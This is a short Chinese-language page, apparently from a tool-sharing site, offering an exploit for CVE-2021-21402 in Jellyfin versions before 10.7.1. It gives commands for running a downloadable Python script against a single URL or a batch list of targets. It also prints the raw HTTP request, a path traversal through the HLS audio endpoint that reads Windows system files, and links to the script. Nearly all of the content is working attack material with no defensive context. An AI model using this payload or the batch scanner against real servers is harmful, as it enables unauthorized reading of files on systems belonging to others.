## 影响范围
“`http
Jellyfin < 10.7.1
``` ## POC ```bash
#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111 #批量检测
python3 CVE-2021-21402.py -f url.txt
``` ## EXP ```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
``` [点我下载 CVE-2021-21402.py](/Gr33kLibrary/download_tool/72/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容